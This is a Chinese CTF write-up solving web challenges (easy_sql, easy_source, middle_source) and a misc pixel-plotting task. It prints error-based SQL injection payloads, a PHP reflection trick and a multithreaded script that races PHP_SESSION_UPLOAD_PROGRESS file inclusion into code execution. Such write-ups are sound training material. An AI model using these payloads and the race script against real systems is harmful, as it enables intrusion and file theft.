Web

easy_sql

用无列名报错注入,猜测有flag表

1
1') || updatexml(1,concat(0x7e,(select * from(select * from flag a join (select * from flag)b using(no, id))c),0x7e),1) %23

可以爆出最后还有一个7ba99583-2ac3-40df-ac62-109330206d66列名。

直接拿flag

1
1') || updatexml(1,concat(0x7e,(select `7ba99583-2ac3-40df-ac62-109330206d66` from flag),0x7e),1) %23

easy_source

存在备份文件.index.php.swo

得到可控新建类和类方法。

然后利用php内置的ReflectionMethod类读取user类中的每个函数的注释。

payload在这

?rc=ReflectionMethod&ra=User&rb=a&rd=getDocComment

然后改rb分别查看其他函数就行了,爆出flag。

middle_source

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
highlight_file(__FILE__);
echo "your flag is in some file in /etc ";
$fielf=$_POST["field"];
$cf="/tmp/app_auth/cfile/".$_POST['cf'];

if(file_exists($cf)){
include $cf;
echo $$field;
exit;
}
else{
echo "";
exit;
}
?> your flag is in some file in /etc

目录扫描

扫描可以扫出来一个.listing,里面有一个you_can_seeeeeeee_me.php,打开发现是phpinfo的内容,但是disable_function禁用了很多函数。

PHP_SESSION_UPLOAD_PROGRESS文件包含

我们可以使用PHP_SESSION_UPLOAD_PROGRESS进行文件包含,然后竞争进行rce,原理在这

写个脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import io
import requests
import threading

sid = 'a18'
data = {"cf": f"../../../../../var/lib/php/sessions/eaheaeebeb/sess_{sid}"}
url = "url_here"


def write(SESS):
while True:
f = io.BytesIO(b'a' * 1024 * 50)
resp = SESS.post(url,
data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php var_dump(readfile("/etc/jhfhabcabi/ghdbcffecc/fffbeacjdg/hfjjaaaabg/fciaaaeehc/fl444444g"));?>',
},
files={'file': ('1.txt', f)},
cookies={'PHPSESSID': sid})


def read(SESS):
while True:
resp = SESS.post(url, data=data)
if '1.txt' in resp.text:
print(resp.text)
event.clear()
else:
pass


if __name__ == "__main__":
event = threading.Event()
with requests.session() as session:
for i in range(1, 30):
threading.Thread(target=write, args=(session,)).start()
for i in range(1, 30):
threading.Thread(target=read, args=(session,)).start()
event.set()

tips: POST必须要加files参数进行文件上传,不然session的临时文件是不会生成的。

Misc

robot

查看流量包可以发现类似坐标点的数值,全部提取出来然后用脚本生成像素图即可得到字符串。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
from PIL import Image

XYlocation = [[27, 36], [28, 35], [29, 35], [31, 35], [32, 35], [33, 35], [35, 35], [36, 35], [37, 35], [39, 34],
[40, 34], [41, 33], [42, 32], [43, 32], [45, 32], [47, 31], [48, 29], [49, 28], [49, 27], [50, 26],
[50, 25], [51, 23], [51, 22], [51, 21], [52, 20], [52, 19], [52, 18], [52, 17], [52, 16], [52, 15],
[51, 14], [50, 14], [49, 14], [48, 14], [47, 14], [46, 14], [45, 14], [44, 14], [43, 14], [42, 14],
[40, 14], [39, 14], [37, 14], [35, 14], [34, 14], [32, 14], [30, 14], [28, 14], [27, 14], [26, 14],
[25, 14], [24, 14], [23, 14], [22, 14], [21, 15], [20, 16], [19, 17], [18, 19], [18, 21], [18, 22],
[18, 23], [18, 24], [18, 26], [18, 27], [18, 28], [18, 30], [18, 32], [18, 33], [18, 34], [19, 37],
[21, 39], [21, 40], [22, 42], [24, 44], [24, 45], [26, 47], [27, 48], [28, 49], [29, 50], [30, 51],
[31, 52], [33, 53], [34, 53], [35, 54], [36, 54], [37, 54], [38, 54], [39, 54], [40, 54], [41, 54],
[44, 54], [46, 54], [48, 54], [50, 54], [52, 53], [53, 53], [54, 52], [55, 52], [56, 52], [58, 51],
[59, 50], [61, 49], [62, 49], [64, 47], [65, 47], [67, 46], [68, 46], [70, 45], [71, 44], [125, 23],
[125, 23], [124, 22], [123, 22], [121, 21], [118, 20], [115, 19], [113, 19], [112, 18], [111, 18],
[109, 17], [106, 16], [104, 16], [103, 16], [102, 15], [101, 15], [100, 15], [99, 15], [98, 15],
[97, 15], [96, 15], [95, 15], [94, 15], [93, 15], [92, 15], [91, 15], [89, 15], [87, 17], [85, 18],
[85, 19], [84, 21], [83, 21], [82, 22], [82, 23], [81, 24], [81, 26], [80, 28], [80, 29], [80, 31],
[80, 32], [79, 34], [79, 35], [79, 37], [79, 39], [79, 41], [79, 43], [79, 44], [79, 46], [79, 47],
[80, 48], [81, 49], [82, 50], [84, 50], [87, 51], [88, 51], [90, 51], [91, 51], [93, 51], [94, 51],
[97, 51], [100, 50], [101, 49], [102, 49], [103, 48], [105, 46], [106, 45], [108, 43], [109, 42],
[110, 41], [111, 39], [112, 38], [112, 36], [113, 34], [114, 33], [115, 32], [115, 31], [116, 30],
[117, 28], [118, 27], [118, 28], [117, 30], [116, 32], [115, 34], [115, 36], [114, 39], [114, 41],
[114, 43], [114, 45], [114, 47], [114, 48], [114, 50], [114, 52], [114, 53], [115, 54], [116, 55],
[117, 56], [118, 57], [120, 57], [122, 57], [124, 57], [126, 57], [128, 57], [131, 57], [133, 57],
[136, 57], [138, 57], [141, 57], [143, 56], [145, 55], [147, 53], [149, 52], [150, 52], [152, 50],
[153, 49], [155, 47], [156, 46], [157, 45], [212, 24], [212, 24], [213, 23], [211, 21], [210, 20],
[209, 19], [208, 18], [207, 17], [206, 16], [205, 15], [204, 15], [201, 14], [200, 14], [199, 14],
[197, 14], [196, 14], [195, 14], [193, 14], [191, 14], [189, 16], [188, 16], [187, 16], [186, 17],
[185, 17], [183, 18], [183, 20], [183, 21], [182, 22], [182, 23], [182, 24], [182, 25], [182, 26],
[182, 27], [182, 29], [183, 31], [184, 32], [186, 33], [187, 34], [188, 34], [189, 35], [190, 35],
[192, 36], [194, 37], [196, 37], [198, 38], [199, 38], [200, 38], [201, 38], [202, 39], [203, 39],
[204, 40], [207, 41], [207, 42], [208, 43], [208, 44], [208, 45], [208, 46], [208, 48], [208, 50],
[208, 51], [207, 53], [207, 54], [206, 56], [204, 58], [203, 60], [202, 61], [201, 62], [201, 63],
[200, 64], [199, 64], [198, 64], [197, 65], [196, 65], [195, 65], [193, 65], [192, 65], [190, 65],
[189, 65], [187, 65], [185, 65], [184, 65], [183, 65], [181, 64], [180, 63], [179, 63], [178, 62],
[177, 62], [175, 61], [174, 60], [173, 59], [243, 20], [243, 20], [244, 19], [244, 21], [244, 25],
[245, 26], [245, 29], [247, 32], [247, 34], [248, 36], [248, 37], [249, 39], [250, 40], [251, 42],
[251, 43], [252, 44], [254, 44], [256, 44], [258, 44], [260, 42], [262, 41], [263, 40], [265, 38],
[266, 35], [267, 32], [268, 30], [271, 27], [272, 25], [273, 22], [274, 21], [275, 20], [275, 19],
[274, 18], [274, 20], [272, 22], [271, 23], [271, 26], [268, 29], [266, 33], [266, 35], [265, 37],
[263, 40], [262, 42], [262, 44], [261, 47], [260, 49], [259, 51], [258, 55], [258, 56], [257, 58],
[255, 61], [254, 62], [253, 63], [253, 64], [252, 65], [251, 66], [250, 67], [249, 68], [248, 69],
[247, 70], [246, 71], [245, 72], [244, 73], [298, 64], [298, 64], [299, 65], [300, 65], [302, 65],
[304, 65], [306, 65], [308, 65], [309, 65], [312, 65], [315, 65], [317, 65], [319, 65], [322, 65],
[325, 65], [327, 65], [330, 65], [332, 65], [334, 66], [335, 66], [20, 103], [20, 104], [20, 107],
[20, 110], [20, 112], [20, 114], [20, 118], [19, 121], [18, 124], [17, 126], [17, 130], [17, 134],
[17, 137], [17, 139], [17, 142], [17, 143], [17, 146], [17, 147], [17, 149], [17, 150], [17, 149],
[17, 148], [17, 146], [18, 145], [18, 143], [19, 142], [20, 141], [20, 140], [21, 138], [21, 137],
[22, 135], [23, 134], [24, 132], [25, 131], [26, 129], [27, 128], [28, 127], [29, 126], [31, 125],
[32, 124], [32, 123], [34, 121], [35, 120], [37, 120], [38, 119], [40, 118], [41, 118], [43, 117],
[44, 116], [46, 115], [48, 115], [49, 114], [50, 113], [51, 113], [52, 112], [80, 121], [80, 121],
[79, 120], [78, 121], [77, 122], [77, 123], [77, 124], [76, 127], [75, 128], [74, 129], [73, 131],
[73, 132], [73, 133], [72, 135], [72, 136], [72, 137], [72, 138], [72, 139], [72, 140], [72, 142],
[72, 144], [72, 145], [73, 148], [74, 149], [77, 150], [78, 150], [80, 151], [81, 151], [82, 151],
[83, 151], [84, 151], [85, 151], [87, 151], [89, 151], [90, 151], [92, 150], [93, 150], [95, 149],
[97, 147], [98, 146], [99, 146], [100, 145], [101, 144], [102, 142], [102, 141], [104, 139], [104, 138],
[105, 136], [105, 135], [105, 133], [105, 132], [105, 131], [105, 129], [104, 128], [103, 126],
[102, 126], [101, 125], [98, 123], [96, 123], [95, 123], [93, 123], [92, 122], [90, 121], [89, 121],
[86, 120], [147, 98], [147, 98], [146, 99], [145, 100], [144, 103], [143, 104], [142, 105], [142, 106],
[142, 109], [142, 111], [142, 114], [141, 118], [140, 120], [139, 123], [138, 127], [138, 129],
[137, 133], [135, 135], [134, 137], [133, 139], [131, 142], [131, 143], [131, 145], [130, 146],
[129, 149], [128, 152], [128, 153], [127, 156], [127, 157], [126, 158], [127, 157], [129, 157],
[130, 156], [132, 156], [134, 155], [137, 153], [138, 152], [139, 151], [140, 150], [143, 149],
[144, 148], [145, 147], [146, 146], [147, 145], [149, 144], [149, 143], [150, 142], [151, 141],
[152, 140], [152, 139], [153, 138], [153, 137], [153, 136], [153, 135], [153, 134], [153, 133],
[152, 132], [151, 131], [150, 131], [149, 130], [147, 129], [186, 136], [186, 136], [183, 137],
[182, 138], [182, 139], [182, 140], [181, 142], [179, 144], [179, 145], [179, 147], [178, 149],
[177, 150], [177, 151], [177, 152], [177, 154], [177, 156], [177, 157], [177, 158], [178, 160],
[179, 161], [180, 162], [181, 163], [182, 164], [184, 164], [186, 164], [187, 164], [188, 164],
[190, 163], [191, 162], [192, 162], [194, 160], [196, 159], [197, 158], [197, 156], [198, 155],
[200, 153], [200, 152], [201, 150], [201, 149], [201, 148], [201, 147], [201, 145], [201, 144],
[201, 142], [201, 141], [201, 139], [201, 138], [200, 136], [199, 135], [198, 135], [197, 135],
[196, 135], [195, 135], [193, 135], [192, 135], [190, 135], [189, 135], [223, 167], [223, 167],
[224, 167], [226, 167], [228, 167], [229, 167], [232, 167], [233, 167], [234, 167], [235, 167],
[237, 167], [238, 167], [240, 167], [241, 167], [243, 167], [244, 167], [246, 167], [247, 167],
[250, 168], [251, 168], [252, 168], [253, 168], [254, 168], [269, 135], [271, 136], [273, 138],
[275, 140], [276, 141], [278, 143], [280, 145], [282, 147], [284, 149], [285, 150], [288, 152],
[289, 153], [291, 154], [293, 156], [294, 157], [296, 159], [297, 160], [298, 161], [299, 162],
[300, 136], [299, 136], [297, 137], [296, 138], [294, 141], [294, 142], [293, 144], [293, 145],
[292, 148], [291, 149], [290, 151], [288, 153], [288, 155], [287, 156], [286, 157], [285, 159],
[284, 160], [283, 161], [282, 162], [281, 163], [280, 164], [279, 165], [327, 142], [328, 143],
[330, 145], [332, 148], [333, 149], [335, 151], [337, 154], [339, 156], [341, 158], [342, 159],
[345, 160], [347, 161], [348, 162], [350, 164], [351, 165], [352, 166], [355, 168], [356, 169],
[351, 143], [350, 143], [348, 144], [347, 144], [346, 145], [343, 148], [341, 150], [339, 152],
[336, 155], [333, 158], [330, 159], [327, 162], [325, 165], [323, 167], [322, 168], [319, 170],
[317, 171], [316, 171], [314, 172], [313, 172]]

im = Image.new('RGB', (500, 500), 'white')

for location in XYlocation:
im.putpixel((location[0], location[1]), (0, 0, 0))
im.save('flag.png')

得到图片

最后根据题目提示转MD5再提交就可以了。